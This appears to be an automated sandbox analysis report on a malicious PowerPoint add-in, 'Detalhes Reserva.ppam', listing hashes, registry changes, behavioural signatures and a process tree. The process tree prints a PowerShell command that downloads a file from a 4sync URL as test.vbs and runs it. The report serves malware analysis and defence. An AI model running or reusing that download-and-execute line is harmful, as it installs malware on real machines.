Analysis
-
max time kernel
121s -
max time network
124s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
17-01-2024 14:33
Static task
static1
Behavioral task
behavioral1
Sample
Detalhes Reserva.ppam
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
Detalhes Reserva.ppam
Resource
win10v2004-20231215-en
General
-
Target
Detalhes Reserva.ppam
-
Size
10KB
-
MD5
234504f9fcb3c9515f8034afdbee8571
-
SHA1
44bd1cb504fb04bc06eda1b4119b37cd7263f559
-
SHA256
649d8fac10370a8922779669c5bbe8e93d4df493991ed8fa98a66de7b7d89560
-
SHA512
62cc313c353a9750a77a265034a4a2deae2b6b6991935cd6c922002a5498606d3ddd02c66cee1906c0a4b90de7531f22390d0b9c1d4beedc078cc1926c3af11c
-
SSDEEP
192:xrXP/D4F6LgKM0wiLB9tZxWut0GkSskv/+KpOjN9nswlDDrCCDNHCtBq9p:dXPI60xsB9tZxWaPAKWNO+CCJf
Malware Config
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
powershell.exedescription pid pid_target process target process Parent C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE is not expected to spawn this process 2812 1040 powershell.exe POWERPNT.EXE -
Drops file in Windows directory 1 IoCs
Processes:
explorer.exedescription ioc process File opened for modification \??\c:\windows\installer\{ac76ba86-7ad7-1033-7b44-a90000000001}\pdffile_8.ico explorer.exe -
Processes:
POWERPNT.EXEexplorer.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2444714103-3190537498-3629098939-1000\Software\Microsoft\Internet Explorer\Toolbar POWERPNT.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2444714103-3190537498-3629098939-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" POWERPNT.EXE Key created \REGISTRY\USER\S-1-5-21-2444714103-3190537498-3629098939-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel POWERPNT.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2444714103-3190537498-3629098939-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" POWERPNT.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2444714103-3190537498-3629098939-1000\Software\Microsoft\Internet Explorer\Toolbar\Locked = "1" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-2444714103-3190537498-3629098939-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" POWERPNT.EXE Key created \REGISTRY\USER\S-1-5-21-2444714103-3190537498-3629098939-1000\Software\Microsoft\Internet Explorer\MenuExt POWERPNT.EXE Key created \REGISTRY\USER\S-1-5-21-2444714103-3190537498-3629098939-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote POWERPNT.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2444714103-3190537498-3629098939-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" POWERPNT.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2444714103-3190537498-3629098939-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" POWERPNT.EXE Key created \REGISTRY\USER\S-1-5-21-2444714103-3190537498-3629098939-1000\Software\Microsoft\Internet Explorer\Toolbar explorer.exe -
Modifies registry class 64 IoCs
Processes:
POWERPNT.EXEdescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A6C-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib\Version = "2.a" POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A70-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib\Version = "2.a" POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493450-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493474-5A91-11CF-8700-00AA0060263B}\ = "HeadersFooters" POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493477-5A91-11CF-8700-00AA0060263B}\TypeLib POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A5F-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib\Version = "2.a" POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934CC-5A91-11CF-8700-00AA0060263B} POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934EF-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32 POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493468-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934C8-5A91-11CF-8700-00AA0060263B} POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934C9-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934CA-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32 POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A6D-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}" POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493456-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32 POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149345A-5A91-11CF-8700-00AA0060263B} POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934CC-5A91-11CF-8700-00AA0060263B}\TypeLib POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A68-F07E-4CA4-AF6F-BEF486AA4E6F} POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934F3-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A57-F07E-4CA4-AF6F-BEF486AA4E6F}\ = "ChartCharacters" POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A7B-F07E-4CA4-AF6F-BEF486AA4E6F}\ProxyStubClsid32 POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493473-5A91-11CF-8700-00AA0060263B} POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493487-5A91-11CF-8700-00AA0060263B}\TypeLib\Version = "2.a" POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934CE-5A91-11CF-8700-00AA0060263B} POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934DA-5A91-11CF-8700-00AA0060263B}\TypeLib POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934DE-5A91-11CF-8700-00AA0060263B}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}" POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A78-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib\Version = "2.a" POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149348A-5A91-11CF-8700-00AA0060263B} POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934C7-5A91-11CF-8700-00AA0060263B} POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934D8-5A91-11CF-8700-00AA0060263B}\TypeLib POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934DC-5A91-11CF-8700-00AA0060263B}\TypeLib\Version = "2.a" POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493493-5A91-11CF-8700-00AA0060263B}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}" POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A77-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib\Version = "2.a" POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149345D-5A91-11CF-8700-00AA0060263B}\TypeLib\Version = "2.a" POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493464-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934D9-5A91-11CF-8700-00AA0060263B} POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934EA-5A91-11CF-8700-00AA0060263B}\ = "AnimationPoints" POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149346B-5A91-11CF-8700-00AA0060263B}\ = "SlideRange" POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934F1-5A91-11CF-8700-00AA0060263B} POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A6A-F07E-4CA4-AF6F-BEF486AA4E6F} POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BA72E550-4FF5-48F4-8215-5505F990966F}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}" POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934C6-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934E2-5A91-11CF-8700-00AA0060263B}\TypeLib POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493455-5A91-11CF-8700-00AA0060263B}\ = "DocumentWindows" POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149345E-5A91-11CF-8700-00AA0060263B} POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493471-5A91-11CF-8700-00AA0060263B}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}" POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149348D-5A91-11CF-8700-00AA0060263B}\TypeLib POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493469-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32 POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493476-5A91-11CF-8700-00AA0060263B}\TypeLib POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493488-5A91-11CF-8700-00AA0060263B}\TypeLib\Version = "2.a" POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A54-F07E-4CA4-AF6F-BEF486AA4E6F}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493481-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934DA-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493486-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32 POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A6D-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493442-5A91-11CF-8700-00AA0060263B} POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493460-5A91-11CF-8700-00AA0060263B}\ = "AddIns" POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A62-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A71-F07E-4CA4-AF6F-BEF486AA4E6F} POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A6E-F07E-4CA4-AF6F-BEF486AA4E6F}\ProxyStubClsid32 POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BA72E552-4FF5-48F4-8215-5505F990966F}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}" POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149346C-5A91-11CF-8700-00AA0060263B}\TypeLib POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934F3-5A91-11CF-8700-00AA0060263B}\TypeLib POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A5B-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib\Version = "2.a" POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A68-F07E-4CA4-AF6F-BEF486AA4E6F}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" POWERPNT.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
POWERPNT.EXEpid process 1040 POWERPNT.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 2812 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2812 powershell.exe -
Suspicious use of WriteProcessMemory 12 IoCs
Processes:
POWERPNT.EXEpowershell.exedescription pid process target process PID 1040 wrote to memory of 1228 1040 POWERPNT.EXE splwow64.exe PID 1040 wrote to memory of 1228 1040 POWERPNT.EXE splwow64.exe PID 1040 wrote to memory of 1228 1040 POWERPNT.EXE splwow64.exe PID 1040 wrote to memory of 1228 1040 POWERPNT.EXE splwow64.exe PID 1040 wrote to memory of 2812 1040 POWERPNT.EXE powershell.exe PID 1040 wrote to memory of 2812 1040 POWERPNT.EXE powershell.exe PID 1040 wrote to memory of 2812 1040 POWERPNT.EXE powershell.exe PID 1040 wrote to memory of 2812 1040 POWERPNT.EXE powershell.exe PID 2812 wrote to memory of 2560 2812 powershell.exe explorer.exe PID 2812 wrote to memory of 2560 2812 powershell.exe explorer.exe PID 2812 wrote to memory of 2560 2812 powershell.exe explorer.exe PID 2812 wrote to memory of 2560 2812 powershell.exe explorer.exe
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE"C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\Detalhes Reserva.ppam"1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of WriteProcessMemory
-
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" wget https://www.4sync.com/web/directDownload/Ik0yKqsl/R3PwqwiF.39d2bc384ef53a8cc875c7c761801167 -o test.vbs; explorer.exe test.vbs2⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\system32\explorer.exe" test.vbs3⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/1040-0-0x000000002DB51000-0x000000002DB52000-memory.dmpFilesize
4KB
-
memory/1040-1-0x000000005FFF0000-0x0000000060000000-memory.dmpFilesize
64KB
-
memory/1040-2-0x0000000071EAD000-0x0000000071EB8000-memory.dmpFilesize
44KB
-
memory/1040-9-0x0000000004780000-0x0000000004880000-memory.dmpFilesize
1024KB
-
memory/1040-21-0x0000000071EAD000-0x0000000071EB8000-memory.dmpFilesize
44KB
-
memory/1040-20-0x000000005FFF0000-0x0000000060000000-memory.dmpFilesize
64KB
-
memory/2812-15-0x00000000026F0000-0x0000000002730000-memory.dmpFilesize
256KB
-
memory/2812-16-0x00000000026F0000-0x0000000002730000-memory.dmpFilesize
256KB
-
memory/2812-17-0x000000006AB60000-0x000000006B10B000-memory.dmpFilesize
5.7MB
-
memory/2812-14-0x000000006AB60000-0x000000006B10B000-memory.dmpFilesize
5.7MB
-
memory/2812-13-0x000000006AB60000-0x000000006B10B000-memory.dmpFilesize
5.7MB
-
memory/3064-18-0x00000000037C0000-0x00000000037D0000-memory.dmpFilesize
64KB
-
memory/3064-19-0x00000000037B0000-0x00000000037B1000-memory.dmpFilesize
4KB
-
memory/3064-22-0x00000000037B0000-0x00000000037B1000-memory.dmpFilesize
4KB